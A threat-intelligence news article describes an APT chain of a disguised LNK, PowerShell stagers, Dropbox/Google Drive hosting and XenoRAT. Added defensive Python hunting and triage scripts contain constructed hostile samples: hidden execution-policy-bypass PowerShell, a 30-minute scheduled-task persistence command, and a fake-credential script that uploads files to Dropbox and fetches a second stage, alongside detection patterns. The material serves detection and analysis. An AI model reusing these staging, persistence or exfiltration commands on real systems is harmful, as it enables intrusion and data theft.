APT Hackers Abusing Google & OneDrive To Host Malicious Scripts

by Esmeralda McKenzie

Threat actors are abusing cloud storage services such as Google Drive, OneDrive, and Dropbox to distribute malware and steal user data. They upload malicious files, including scripts, RAT (Remote Access Trojan) payloads, and decoy documents, which in turn download further malware or leak sensitive information. Because traffic to these services is trusted and allowed on most networks, the command-and-control channel blends in with ordinary cloud usage.

The attacks involve a chain of files, typically beginning with a shortcut file (LNK) that retrieves and executes several malicious components stored in the cloud. Since the components live in attacker-controlled storage, the operators can update the malware easily and deploy new functionality without redelivering anything to the victim.


Figure: Operation activity

A disguised LNK file named “Police Cyber Investigation Bureau - Internet Use History (check now to keep your PC safe).html.lnk” launches PowerShell, which decodes a Base64-encoded payload containing further PowerShell commands. The double extension is the trick: Windows Explorer never displays the .lnk extension of a shortcut, even when extension hiding is turned off, so the file appears to the victim as an ordinary .html document.

The decoded commands are written to a temporary file (ms_temp_08.ps1) in the user's TEMP directory; the launcher then bypasses the PowerShell execution policy and runs that temporary file in a hidden window, so no console is visible to the victim.

Figure: The list of registered tasks

The malicious script ms_temp_08.ps1 downloads a decoy document named “Police Cyber Investigation Bureau - Internet Use History (check now to keep your PC safe).html” and opens it, so the victim sees the content the shortcut promised.

It then creates a new PowerShell script named ms_update.ps1 in the TEMP folder and registers it with the Task Scheduler to run every 30 minutes, giving the operators persistence and a recurring update channel to the host.

Additionally, it downloads another file named SoJ****-F.txt and saves it as first.ps1 in the TEMP folder for execution.
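The chain described above (LNK launches PowerShell, a Base64 stager is written to TEMP, it is run with the execution policy bypassed in a hidden window, and a 30-minute scheduled task is registered) leaves a recognisable sequence in process-creation telemetry. The following hunting script is an added example, not code from the ASEC analysis or from cybersecuritynews.com. Its log records are constructed to resemble Sysmon Event ID 1 fields, and since the page does not give the stager's literal command lines, the `-ep bypass`, `-w hidden` and `schtasks /SC MINUTE /MO 30` patterns are assumptions about how such a chain typically looks rather than the sample's exact arguments.

```python
"""Hunt for the LNK -> PowerShell -> scheduled-task chain in process-creation logs.

Added example; not code from the ASEC analysis or cybersecuritynews.com.
The records below are constructed to resemble Sysmon Event ID 1 fields. The
command-line patterns are assumptions about a typical stager, not the sample's
literal arguments.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    host: str
    parent_image: str
    image: str
    command_line: str


# (rule name, weight, parent-image regex, image regex, command-line regex)
RULES = [
    # Double-clicked LNK: explorer.exe spawns PowerShell that decodes a Base64 stager.
    ("lnk_stager_base64_powershell", 3,
     r"\\explorer\.exe$", r"\\powershell\.exe$",
     r"(FromBase64String|-enc(odedcommand)?\s)"),
    # Second stage: execution policy bypassed, hidden window, script under %TEMP%.
    ("hidden_bypass_temp_script", 4,
     r".*", r"\\powershell\.exe$",
     r"(?=.*-(ep|executionpolicy)\s+bypass)(?=.*-w(indowstyle)?\s+hidden)"
     r"(?=.*\\temp\\[^\s\"']+\.ps1)"),
    # Persistence: a task firing every 30 minutes that runs a %TEMP% script.
    ("schtasks_30min_temp_script", 4,
     r".*", r"\\schtasks\.exe$",
     r"(?=.*/create)(?=.*/sc\s+minute)(?=.*/mo\s+30)(?=.*\\temp\\[^\s\"']+\.ps1)"),
]

PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample telemetry: WS01 shows the whole chain, WS02 is benign admin use.
SAMPLE_EVENTS = [
    ProcEvent("WS01", r"C:\Windows\explorer.exe", PS_EXE,
              r"powershell.exe -NoP -w hidden -c $s=[Text.Encoding]::UTF8.GetString("
              r"[Convert]::FromBase64String('UwBlAHQA...'));Set-Content $env:TEMP\ms_temp_08.ps1 $s"),
    ProcEvent("WS01", PS_EXE, PS_EXE,
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -w hidden '
              r'-File C:\Users\victim\AppData\Local\Temp\ms_temp_08.ps1'),
    ProcEvent("WS01", PS_EXE, r"C:\Windows\System32\schtasks.exe",
              r'schtasks.exe /Create /F /SC MINUTE /MO 30 /TN "UpdateCheck" '
              r'/TR "powershell -ep bypass -w hidden -File C:\Users\victim\AppData\Local\Temp\ms_update.ps1"'),
    ProcEvent("WS02", r"C:\Windows\explorer.exe", PS_EXE,
              r"powershell.exe -NoProfile -Command Get-Process | Sort-Object CPU"),
    ProcEvent("WS02", r"C:\Windows\System32\cmd.exe", PS_EXE,
              r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\deploy.ps1"),
    ProcEvent("WS02", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\schtasks.exe",
              r"schtasks.exe /Query /TN \Microsoft\Windows\UpdateOrchestrator\Schedule Scan /V"),
]


def hunt(events):
    """Score every host; returns {host: {"score": int, "hits": [rule names]}} for hosts with hits."""
    compiled = [(n, w, re.compile(p, re.I), re.compile(i, re.I), re.compile(c, re.I | re.S))
                for n, w, p, i, c in RULES]
    findings = {}
    for ev in events:
        for name, weight, parent_re, image_re, cmd_re in compiled:
            if (parent_re.search(ev.parent_image) and image_re.search(ev.image)
                    and cmd_re.search(ev.command_line)):
                entry = findings.setdefault(ev.host, {"score": 0, "hits": []})
                entry["score"] += weight
                entry["hits"].append(name)
    return findings


def chain_hosts(events, threshold=8):
    """Hosts whose combined score indicates the full chain rather than one lone artefact."""
    return sorted(host for host, f in hunt(events).items() if f["score"] >= threshold)


if __name__ == "__main__":
    for host, f in hunt(SAMPLE_EVENTS).items():
        print(f"{host}: score={f['score']} hits={f['hits']}")
    print("chain detected on:", chain_hosts(SAMPLE_EVENTS))
```

The scoring deliberately needs more than one rule to fire: a lone `-ExecutionPolicy Bypass` is everyday administration (WS02 shows one), whereas a hidden-window script in TEMP plus a 30-minute task pointing at TEMP is the combination worth paging someone for.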

The malicious script ms_update.ps1 uses Dropbox to download a secondary script, info.ps1, from the threat actor's storage; that script is likewise staged as a temporary file (info.ps1) on the victim's system.

Figure: Additionally discovered decoy documents

Analysis by the AhnLab Security Intelligence Center (ASEC) revealed decoy documents in several formats (HTML, Word, HWP, and PDF) inside the Dropbox storage, placed there to mask the malicious intent.

These decoys use themes such as university cooperation requests, delivery confirmations, and international affairs to target specific victims, a sign of social engineering tailored to each recipient.

Each LNK file downloads two PowerShell scripts (first.ps1 and info.ps1) from the attacker's cloud storage.

The scripts, named after the intended targets, were retrieved from a cloud storage account other than the Dropbox account first suspected.

Figure: Confirmed script file names

Each target appears to have a dedicated folder containing a decoy document and two scripts, which authenticate with stolen Dropbox OAuth credentials (client_id, client_secret, and refresh_token). Because the refresh token lets the script mint fresh access tokens on demand, the malware's traffic is ordinary TLS to Dropbox's API endpoints and does not stand out as command-and-control.

first.ps1 behaves like spyware: when run, it gathers system information including the operating system version, installed security software, boot time, machine type (laptop or desktop), running processes, and even the PowerShell execution policy settings.

The malicious PowerShell script info.ps1 (SoJ****-X.txt) uploads a file to the threat actor's Dropbox and downloads additional malware from Google Drive; the uploaded file most likely serves to confirm that the script ran and to leak data once it has been modified.
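When a script like ms_update.ps1 or info.ps1 is recovered from TEMP, the quickest triage is static: pull out the hard-coded Dropbox OAuth triplet (client_id, client_secret, refresh_token) and the cloud endpoints it talks to, so the app key can be reported for takedown without pasting the live secret into a ticket. The scanner below is an added example, not code from ASEC or cybersecuritynews.com. Its `SAMPLE_SCRIPT` is a constructed stand-in for such a script (the real script bodies are not on the page) and every credential value in it is fake; the Dropbox and Google Drive URLs it matches are those services' documented public endpoints.

```python
"""Static triage of a dropped PowerShell script for cloud-storage abuse indicators.

Added example; not code from ASEC or cybersecuritynews.com. SAMPLE_SCRIPT is a
constructed stand-in for a script like info.ps1, with fake credential values.
"""
import re

# These endpoints are what a legitimate Dropbox or Google Drive client also uses,
# which is exactly why the traffic blends in. The finding is the combination of
# hard-coded OAuth material plus these URLs inside a script dropped in %TEMP%.
CLOUD_ENDPOINT_PATTERNS = {
    "dropbox_oauth_refresh": r"api\.dropboxapi\.com/oauth2/token",
    "dropbox_content_api": r"content\.dropboxapi\.com/2/files/(upload|download)",
    "gdrive_direct_download": r"drive\.google\.com/uc\?[^\s\"']*export=download",
    "onedrive_download": r"onedrive\.live\.com/download|1drv\.ms/",
}
CRED_KEYS = ("client_id", "client_secret", "refresh_token")
# Matches PowerShell-style assignments such as:  $client_secret = "abc..."
CRED_RE = re.compile(
    r"\$?(client_id|client_secret|refresh_token)\s*=\s*[\"']([^\"']+)[\"']", re.I)

SAMPLE_SCRIPT = r"""
# constructed sample, not the actual info.ps1
$client_id = "a1b2c3d4e5f6g7h"
$client_secret = "h7g6f5e4d3c2b1a"
$refresh_token = "FAKE-refresh-token-constructed-for-this-example"
$body = "grant_type=refresh_token&refresh_token=$refresh_token&client_id=$client_id&client_secret=$client_secret"
$tok = (Invoke-RestMethod -Method Post -Uri "https://api.dropboxapi.com/oauth2/token" -Body $body).access_token
$hdr = @{ Authorization = "Bearer $tok"; "Dropbox-API-Arg" = '{"path":"/v/check.txt","mode":"overwrite"}'; "Content-Type" = "application/octet-stream" }
Invoke-RestMethod -Method Post -Uri "https://content.dropboxapi.com/2/files/upload" -Headers $hdr -InFile "$env:TEMP\check.txt"
Invoke-WebRequest -Uri "https://drive.google.com/uc?export=download&id=FAKEFILEID" -OutFile "$env:TEMP\stage2.dat"
"""


def mask(value):
    """Keep enough of a credential to report the app for takedown without leaking it whole."""
    return value if len(value) <= 6 else value[:4] + "..." + value[-2:]


def triage(script_text):
    """Extract masked OAuth material and cloud endpoints; return a verdict dict."""
    creds = {}
    for m in CRED_RE.finditer(script_text):
        creds.setdefault(m.group(1).lower(), m.group(2))   # first assignment wins
    endpoints = sorted(name for name, pat in CLOUD_ENDPOINT_PATTERNS.items()
                       if re.search(pat, script_text, re.I))
    triplet = all(k in creds for k in CRED_KEYS)
    uses_dropbox = any(e.startswith("dropbox_") for e in endpoints)
    if triplet and uses_dropbox:
        verdict = "cloud_storage_c2_candidate"
    elif creds or endpoints:
        verdict = "cloud_storage_indicators_present"
    else:
        verdict = "no_cloud_storage_indicators"
    return {
        "credentials": {k: mask(v) for k, v in creds.items()},
        "complete_oauth_triplet": triplet,
        "cloud_endpoints": endpoints,
        "verdict": verdict,
    }


if __name__ == "__main__":
    for key, val in triage(SAMPLE_SCRIPT).items():
        print(f"{key}: {val}")
```

The masked client_id is the value to hand to the provider's abuse desk; the refresh token and secret never need to leave the analysis host, and the triage output is safe to paste into a case record.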

Figure: A part of XenoRAT's code

The downloaded malware is a compressed file carrying a custom file signature, so that at a glance it appears to be an RTF document.

Once decompressed, the payload, a C# (.NET) assembly, is loaded and executed in memory using reflection, so the executable is never written to disk where file-based scanning would see it.
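A header that says RTF over a body that inflates into a PE is the kind of mismatch an analyst can test for directly. The checker below is an added example, not code from ASEC or cybersecuritynews.com, and not the malware's real container layout: it assumes the forged signature is the ASCII RTF header `{\rtf1` prepended straight onto a zlib or gzip stream, since the page only says the file wears an RTF-looking signature over compressed data. The sample bytes, including the fake .NET-looking PE, are constructed.

```python
"""Check a downloaded file whose signature claims RTF but whose body is a compressed PE.

Added example; not code from ASEC or cybersecuritynews.com and not the malware's
real container format. Assumption: the forged signature is the RTF header
"{\\rtf1" prepended directly to a zlib (or gzip) stream. Sample bytes are constructed.
"""
import gzip
import math
import zlib

RTF_MAGIC = b"{\\rtf1"
MZ_MAGIC = b"MZ"


def shannon_entropy(data):
    """Bits per byte; genuine RTF (ASCII control words) sits well below compressed data."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def inspect_disguised_file(data):
    """Strip a claimed RTF header, try to inflate what follows, and classify the payload."""
    claims_rtf = data.startswith(RTF_MAGIC)
    body = data[len(RTF_MAGIC):] if claims_rtf else data
    result = {
        "claims_rtf": claims_rtf,
        "body_entropy": round(shannon_entropy(body), 2),
        "compression": None,
        "payload_type": None,
        "dotnet_hint": False,
        "disguised": False,
    }
    if not body:
        return result
    # A real RTF body is text and will not inflate; a forged header over a
    # compressed blob will. Try the decompressors at the byte right after the header.
    for name, inflate in (("zlib", zlib.decompress), ("gzip", gzip.decompress)):
        try:
            payload = inflate(body)
        except (zlib.error, OSError, EOFError):
            continue
        result["compression"] = name
        result["payload_type"] = "pe_executable" if payload.startswith(MZ_MAGIC) else "other"
        # Managed (.NET) executables import mscoree.dll for _CorExeMain/_CorDllMain.
        result["dotnet_hint"] = b"mscoree.dll" in payload
        break
    result["disguised"] = claims_rtf and result["compression"] is not None
    return result


# Constructed stand-in for the payload: an MZ stub whose e_lfanew points at a
# "PE\0\0" header, plus the mscoree.dll import string, zlib-compressed behind a
# forged RTF header.
FAKE_DOTNET_PE = (MZ_MAGIC + b"\x90" * 58 + b"\x40\x00\x00\x00" + b"PE\x00\x00"
                  + b"\x00" * 120 + b"mscoree.dll\x00_CorExeMain\x00")
SAMPLE_DISGUISED = RTF_MAGIC + zlib.compress(FAKE_DOTNET_PE)
SAMPLE_GENUINE_RTF = b"{\\rtf1\\ansi\\deff0 {\\fonttbl {\\f0 Calibri;}} Meeting notes\\par }"

if __name__ == "__main__":
    print("disguised sample:", inspect_disguised_file(SAMPLE_DISGUISED))
    print("genuine rtf:     ", inspect_disguised_file(SAMPLE_GENUINE_RTF))
```

The same idea generalises to any "looks like a document" container: trust the decoded content, not the first few bytes, and treat a successful inflate behind a text-format signature as a finding in its own right.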

The file system-xn.dat launches the XenoRAT malware, giving remote attackers control over the infected device.

XenoRAT can load additional malware, manipulate processes, and communicate with a command-and-control server for further instructions.

Source credit: cybersecuritynews.com
